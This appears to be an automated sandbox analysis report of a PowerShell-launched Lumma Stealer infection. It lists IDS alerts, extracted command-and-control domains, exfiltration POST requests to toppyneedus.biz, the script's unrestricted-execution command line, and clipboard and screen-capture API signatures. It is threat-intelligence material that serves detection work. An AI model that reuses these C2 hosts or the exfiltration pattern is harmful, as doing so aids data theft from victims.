Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49759 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49743 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.7:61999 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.7:61168 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49771 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49791 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49782 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49826 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49802 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49751 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49759 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49751 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49743 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49743 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49826 -> 104.21.29.142:443
Source: Malware configuration extractor | URLs: pleasedcfrown.biz
Source: Malware configuration extractor | URLs: affordtempyo.biz
Source: Malware configuration extractor | URLs: mixedrecipew.biz
Source: Malware configuration extractor | URLs: hoursuhouy.biz
Source: Malware configuration extractor | URLs: suggestyuoz.biz
Source: Malware configuration extractor | URLs: lightdeerysua.biz
Source: Malware configuration extractor | URLs: toppyneedus.biz
Source: Malware configuration extractor | URLs: impolitewearr.biz
Source: Malware configuration extractor | URLs: grapeprivatter.cyou
Source: Joe Sandbox View | IP Address: 104.21.29.142
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49751 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49759 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49743 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49771 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49791 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49782 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49826 -> 104.21.29.142:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 104.21.29.142:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 46 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=69MNZEJ5HAECH070 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12831 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=O3L3XFLJLH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15027 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FEGAA9ZO8PKK2G | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20376 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GGL558OSKC7I9LM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2610 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RVMKHS8I | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 150286 | Host: toppyneedus.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 81 | Host: toppyneedus.biz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: grapeprivatter.cyou
Source: global traffic | DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic | DNS traffic detected: DNS query: toppyneedus.biz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: toppyneedus.biz
      Source: powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1914181434.00000219C75E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co-M1
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/N
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1520232488.00000000011CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/api
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/apieB
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/apiz
      Source: RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/it
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/pi
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49802 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49826 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043A020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_0043A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043A1C0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC48211D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043388C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00445B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042CBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00426420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041CEE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00429F42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040F717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00401040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00425850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00409000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00436010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00446010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042D020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004450C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004228D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004450D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004450DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004300E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041B0F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040D0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004048B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004380B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042F0B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042D14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00427150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043395B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00413100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042DA42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042E240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043DA4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042C250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043E260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00435A69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00416200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00424230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042AAC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042EAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00422280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043428A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00433AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00421B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042E367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00413309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00445310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00402B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00434BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004343EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004463F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00408B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00434393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004363AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004453B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00411BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041FC4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00426C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042FE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00413CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043D560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042DD6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A51C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004105D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00403590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00439DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041E5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00407E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00421E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043F6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004156CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004456E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00433698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004226A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00402760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00428764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043C778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042BF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043FF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00442710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00403FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040EF95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041D797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00444FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00418FF0 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040B350 appears 50 times
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@6/10@4/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043EC10 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vujytmm.nh1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 176.113.115.225.ps1 | Virustotal: Detection: 11%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
